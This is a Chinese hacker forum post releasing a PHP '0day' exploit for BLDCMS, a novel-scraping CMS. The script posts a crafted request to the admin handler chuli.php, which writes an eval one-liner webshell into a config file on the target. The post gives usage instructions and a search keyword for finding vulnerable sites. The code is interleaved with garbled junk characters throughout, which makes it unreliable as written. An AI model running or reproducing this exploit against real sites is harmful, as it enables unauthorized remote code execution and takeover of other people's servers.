之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了
既然都有人发了 我就把我之前写好的EXP放出来吧
view source print?01.php;">% H2 @% B4 ]* o* u* q
02.<!--?php! b: D$ Y# b' S3 b2 z7 b
03.echo "-------------------------------------------------------------------, t& B2 |" G7 M( h% D& Y, [1 S5 w
04.
$ d( m$ \) U } p: Z, r05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
7 H' g( k/ z$ N" l6 d' R& H06.
% G0 l M, o; t# Z07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun# h; c9 @+ t* a: \
08. - j( W; D6 j- B! E* y
09.QQ:981009941\r\n 2013.3.21\r\n
; W+ G9 b' e5 J4 n10. 9 o* D& w. Z3 |0 q% e
11. 0 `" j G5 n. P+ p$ b2 v' t9 ]
12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码
4 ~; ] Q8 D5 i7 ]$ l3 w13. 5 ?7 t* T/ p9 L* e
14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------
0 d( o; C2 q/ {+ e15.
_4 o7 [, `9 i' J6 }16.--------------------------------------------------------------------\r\n";% a+ y" z$ Y, U3 j. v7 Y G
17.$url=$argv[1];1 w4 d- R( Z' @6 \
18.$dir=$argv[2];
x" O4 W9 k2 F1 n w" p19.$pass=$argv[3];
7 M& F% R& K, V20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
# W# e) k: ^' a21.if (emptyempty($pass)||emptyempty($url))* t, x4 S% W, K. X
22.{exit("请输入参数");}6 A; ?$ x `2 o: ? J) ~ U
23.else/ g8 c. p4 D3 B; _# h
24.{; _) l8 h5 ] n" P. a% R5 k
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
8 A I6 E! j0 f2 D( y1 U1 a/ J; T26. ) d4 e( }) T, h
27.al;
+ a$ s& h" |7 F- ]28.$length = strlen($fuckdata);
$ T& ?7 q7 u& J# x29.function getshell($url,$pass)
# ~; ~& H& Z6 G; U, t M/ V30.{
+ K4 ]# r( x. ]# Q/ G& o31.global $url,$dir,$pass,$eval,$length,$fuckdata;6 g; J0 e {$ O# L1 k! M
32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
! [8 o- L# w" A! F: {5 Q& Y) \33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n"; H8 n W3 X, f/ H& X
34.$header .= "User-Agent: MSIE\r\n";
- G H6 j& R# o) s) P& C' o8 n35.$header .= "Host:".$url."\r\n";
. N: e X/ C5 @$ M36.$header .= "Content-Length: ".$length."\r\n";! O! J/ ~) R( f" A- t5 Q/ C |+ Y
37.$header .= "Connection: Close\r\n";- ~9 Q, z6 Y9 z
38.$header .="\r\n";8 @: x- K x- [! a, J
39.$header .= $fuckdata."\r\n\r\n";4 e2 d: d. C- O8 a- y
40.$fp = fsockopen($url, 80,$errno,$errstr,15);
/ f O5 j: s- L* t! D' [/ R0 q. G! b41.if (!$fp); S8 ]: R8 B @
42.{
, r: x" [; |4 J* k2 ~43.exit ("利用失败:请检查指定目标是否能正常打开");. p1 N2 C3 o+ e2 Y9 a% d
44.}
7 {' q' s# q/ b* q4 Q6 o45.else{ if (!fputs($fp,$header))
* b) t* n% \) h5 J46.{exit ("利用失败");}0 W0 Z$ s( K& V2 c+ \8 b/ |0 Q! D
47.else
( ^; ~& N6 D7 n48.{- Z6 a. ?6 v$ [9 Q! [% z, B7 s! M
49.$receive = '';' U \; p/ \" M
50.while (!feof($fp)) {
& }: x& i( p+ w1 Y! U51.$receive .= @fgets($fp, 1000);- Y& T- q: C1 ?3 q
52.}
P* @% a! ?" V4 B' l53.@fclose($fp);6 W: b0 N' O+ N; |/ v) w, f
54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标1 F8 D2 l6 U7 T# F' a
55.
# Q. g+ v- T1 L q- |; y56.GPC是否=off)";+ [- [% {7 m2 p, A& ]
57.}}8 W' ]' I# [% a6 u! P# m
58.}
h4 y$ g8 l. v! q1 r' n/ a59.}
; A+ I9 W4 K5 K, B$ f' \1 \" b60.getshell($url,$pass); m h3 g# h& k" R; C( H% O3 I3 f3 _1 n
61.?-->9 b& p( Y( _+ C
by 数据流